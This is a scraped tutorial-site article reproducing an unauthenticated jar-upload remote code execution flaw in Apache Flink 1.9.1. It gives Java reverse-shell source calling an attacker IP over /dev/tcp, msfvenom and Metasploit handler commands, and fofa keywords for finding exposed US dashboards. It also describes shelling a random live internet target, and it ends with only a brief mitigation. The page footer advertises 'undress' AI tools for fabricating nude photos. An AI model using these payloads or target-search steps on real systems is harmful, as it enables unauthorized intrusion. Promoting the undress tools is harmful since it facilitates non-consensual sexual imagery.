Operation and Maintenance
Safety
Example analysis of remote code execution caused by uploading any jar package in apache flink
Example analysis of remote code execution caused by uploading any jar package in apache flink
Vulnerability description:
On November 11, 2019, security engineer Henry Chen disclosed a vulnerability that allows Apache Flink to upload jar packages without authorization, leading to remote code execution. Since Apache Flink Dashboard can be accessed without authentication by default, a shell can be obtained by uploading a malicious jar package and triggering the execution of malicious code.
Scope of influence
<= 1.9.1 (latest version)
Environment setup:
(1) Install in advance Good java (requires java8 or above)
(2) Download flink-1.9.1
Download address: https://www.apache.org/ dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz
(3) Unzip the downloaded compressed package:
tar -zxf flink-1.9.1-bin-scala_2.11.tgz
( 4) Go to the decompressed directory and go to its bin directory:
(5) Start flink:
./start-cluster.sh
(6) Browser Access verification (default port is 8081):
http://172.26.1.108:8081
<p >package shell;public class Revs { <br/> /** * @param args * @throws Exception */ <br/> public static void main(String[] args) throws Exception { <br/> // TODO Auto-generated method stub <br/> Runtime r = Runtime.getRuntime(); <br/> String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/192.168.1.12/9999;<br> cat <&5 | while read line; do $line 2>&5 >&5; done"}; <br> Process p = r.exec(cmd); <br> p.waitFor();<br> }}</p>
<p>(2) 利用eclipse将其导出为一个可执行的jar包: a. 点击 File-->Export(导出)</p>
<p><img src="/static/imghw/default1.png" data-src="https://img.php.cn/upload/article/000/887/227/168412687669673.jpg" class="lazy" alt="apache flink任意jar包上传导致远程代码执行的示例分析">##b. Then select java-->Runnable JAR file</p>
<p></p>
<p><img src="/static/imghw/default1.png" data-src="https://img.php.cn/upload/article/000/887/227/168412687683044.jpg" class="lazy" alt="apache flink任意jar包上传导致远程代码执行的示例分析">c. Then select the corresponding java project, export path and export file name</p>
<p></p>
<p><img src="/static/imghw/default1.png" data-src="https://img.php.cn/upload/article/000/887/227/168412687618388.jpg" class="lazy" alt="apache flink任意jar包上传导致远程代码执行的示例分析">Picture</p>
<p>This generates a jar package for the rebound shell</p>
<p>msf generates a jar horse:</p>
<p>(1) Use msfvenom to generate a jar horse:</p>
<pre class="brush:php;toolbar:false">msfvenom -p java/meterpreter/reverse_tcp LHOST=172.26.1.156 LPORT=9999 W >text.jar(2) Open msf's listening module, and listen to port 9999 (to be consistent with the port set by our jar horse)
use exploit/multi/handlerset payload java/meterpreter/reverse_tcpset LHOST 172.26.1.156set LPORT 9999exploit
(3) After uploading the jar horse we generated and submitting it (this Please refer to the reproduction below for some operations). You can see that we successfully received the shell:
Local reproduction:
(1) Access Target:
(2) Click Submit New job to open the page for uploading the jar package:
(3) Click Add New to select the jar package we made:
#(4) Monitor the port on our machine (the jar package we made directly rebounds the shell)
(5) Click on the jar package we just uploaded:
(6) Then click Submit, you can see that we have successfully received the shell:
Internet site:
fofa keywords:
"apache-flink-dashboard" && country="US"
(1) Find a random target:
(2) Click Submit new Job, you can see that it allows us to upload jar packages
(3) Use the function of flink to upload the jar package to upload our jar package:
(4) After uploading, we Monitor the port
on the vps (5) Then go back to the browser, select the jar package we just uploaded, and then click Submitting to submit. You can see that our vps has successfully received the shell
Vulnerability fix:
It is recommended to set a firewall policy to only allow whitelist IP to access the apache flink service, and add this to the web proxy (such as apache httpd) The digest authentication of the service.
Always pay attention to the official website and wait for new versions or patch updates
The above is the detailed content of Example analysis of remote code execution caused by uploading any jar package in apache flink. For more information, please follow other related articles on the PHP Chinese website!
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
How to import jar package in eclipse
Jan 12, 2024 pm 03:45 PM
How to import jar packages in eclipse: 1. Create a new Java project; 2. Create a library folder; 3. Copy the jar package to the library folder; 4. Configure the project build path; 5. Add the jar package to the build path. ; 6. Configure the project build path; 7. Verify the import results; 8. Precautions; 9. Other import methods; 10. Clean and update; 11. Maintain and update the library. Detailed introduction: 1. Create a new Java project, start Eclipse IDE, select the "File" menu in the top menu bar, etc.
How to import jar package in maven
Jan 08, 2024 pm 01:59 PM
The steps for maven to import a jar package: 1. Download the jar package; 2. Create a Maven project; 3. Add dependencies; 4. Add dependency elements; 5. Save the pom.xml file; 6. Build the project; 7. Verify the import. Detailed introduction: 1. Download the jar package. First download the required jar package from the relevant website or source code warehouse. Make sure that the downloaded jar package is compatible with your project and meets the required version requirements; 2. Create a Maven project. If There is no Maven project yet, you need to create one first and so on.
Use Flink in Go language to achieve efficient data flow processing
Jun 15, 2023 pm 09:10 PM
With the advent of the big data era, data processing has become a problem that needs to be paid attention to and solved in various industries. As a high-performance data processing tool, the emergence of Flink provides us with an efficient, reliable, and scalable solution. In this article, we will introduce how to use Flink in Go language to achieve efficient data flow processing. 1. Introduction to Flink Apache Flink is an open source distributed data processing platform. Its goal is to provide an efficient, reliable, and scalable way to process large-scale data.
Comparison between Spark Streaming and Flink
Apr 19, 2024 pm 12:51 PM
SparkStreaming and Flink are both stream processing frameworks with different features: Programming model: SparkStreaming is based on the SparkRDD model, while Flink has its own streaming API. State management: Flink has built-in state management, while SparkStreaming requires external solutions. Fault tolerance: Flink is based on snapshots, while SparkStreaming is based on checkpoints. Scalability: Flink is based on stream operator chains, while SparkStreaming is based on cluster scaling. In real-time data aggregation use cases, Flink generally performs better than SparkStreaming because it provides better throughput
Maven Advanced Tutorial: In-depth exploration of various methods of Jar package import
Feb 23, 2024 pm 02:57 PM
Title: Maven Advanced Tutorial: In-depth exploration of various methods of Jar package import. As a Java project management tool, Maven is widely used in project construction, dependency management, etc. In the actual development process, we often use Jar packages of various third-party libraries, and how to effectively import Jar packages has become a skill that must be mastered. This article will delve into the methods of importing Jar packages in Maven, including using local Jar packages, remote warehouse Jar packages, and custom Jar packages, and give specific details.
MySQL Jar package usage guide and precautions
Mar 01, 2024 pm 04:21 PM
MySQL Jar package usage guide and precautions MySQL is a commonly used relational database management system. Many Java projects use MySQL as the backend for data storage. In a Java project, to interact with the MySQL database, you need to use the Java driver (i.e. Jar package) provided by MySQL. This article will introduce the usage guidelines and precautions for the MySQL Jar package, and provide specific code examples to help readers better use the MySQL driver. 1. M
Guide on how to correctly import Jar packages into Maven projects
Feb 19, 2024 pm 12:00 PM
Maven Getting Started Guide: How to correctly import Jar packages? Maven is a powerful project management tool that can help developers manage project dependencies, build projects, etc. During project development, we often need to import external Jar packages to implement some functions. This article will introduce how to use Maven to correctly import Jar packages and provide specific code examples. First, we need to add dependencies on the required Jar packages in Maven's pom.xml file. In pom.xml, there is a
Real-time stream processing using Kafka and Flink in Beego
Jun 22, 2023 pm 04:18 PM
With the advent of the big data era, we often need to process and analyze real-time data. Real-time stream processing technology has become a mainstream method for processing large-scale real-time data due to its high performance, high scalability and low latency. In real-time stream processing technology, Kafka and Flink, as common components, have been widely used in many enterprise-level data processing systems. In this article, we will introduce how to use Kafka and Flink in Beego for real-time stream processing. 1. Introduction to Kafka
